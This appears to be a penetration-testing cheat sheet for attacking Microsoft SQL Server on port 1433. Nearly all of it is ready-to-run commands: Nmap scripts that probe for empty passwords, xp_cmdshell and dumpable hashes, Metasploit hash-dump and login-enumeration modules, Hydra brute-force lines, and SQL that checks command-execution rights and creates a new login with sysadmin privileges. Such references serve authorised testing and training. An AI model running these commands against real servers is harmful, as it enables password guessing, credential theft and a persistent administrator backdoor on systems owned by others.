Ms-SQL 1433
1. Nmap for MSSQL Enumeration:
Search for related Nmap scripts:
nmap --script-help "ms and sql"
Run Nmap with selected MSSQL scripts:
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13
Run specific MSSQL scripts:
nmap --script ms-sql-info -p 1433 10.0.0.0 nmap --script ms-sql-config -p 1433 10.0.0.0 nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 10.0.0.0 nmap --script ms-sql-* -p 1433 10.0.0.0
2. Metasploit Modules for MSSQL:
Common MSSQL Metasploit modules:
msfconsole msf> use admin/mssql/mssql_enum msf> use admin/mssql/mssql_enum_domain_accounts msf> use admin/mssql/mssql_enum_sql_logins msf> use auxiliary/admin/mssql/mssql_findandsampledata msf> use auxiliary/admin/mssql/mssql_idf msf> use auxiliary/scanner/mssql/mssql_hashdump msf> use auxiliary/scanner/mssql/mssql_schemadump
These modules allow you to:
Enumerate MSSQL logins and domain accounts.
Dump hashes and retrieve database schema.
3. Bruteforcing MSSQL with Hydra:
Bruteforce with a username list:
hydra -L usernames.txt -p password 10.0.0.0 mssql
Bruteforce with a password list:
hydra -l username -P passwords.txt 10.0.0.0 mssql
4. Connecting to MSSQL with Impacket:
SQL Authentication:
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
Windows Authentication:
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth
5. Connecting to MSSQL with sqsh:
Basic connection:
sqsh -S <target-ip> -U username -P password
Connect to a specific database:
sqsh -S <target-ip> -U username -P password -D database
6. SQL Commands for Enumeration:
Get all users:
SELECT * FROM sys.database_principals;
Switch to a specific database:
USE <database>;
List available databases:
SELECT * FROM master.dbo.sysdatabases;
List tables within a database:
SELECT * FROM information_schema.tables;
Get content from a table:
SELECT * FROM <database_name>.dbo.<table_name>;
Get the MSSQL version:
SELECT @@version;
Check permission to execute OS commands:
USE master; EXEC sp_helprotect 'xp_cmdshell';
Get linked servers:
EXEC sp_linkedservers; SELECT * FROM sys.servers;
Create a new user with sysadmin privileges:
CREATE LOGIN tester WITH PASSWORD = 'password'; EXEC sp_addsrvrolemember 'tester', 'sysadmin';
Get the current username:
SELECT user_name();
Last updated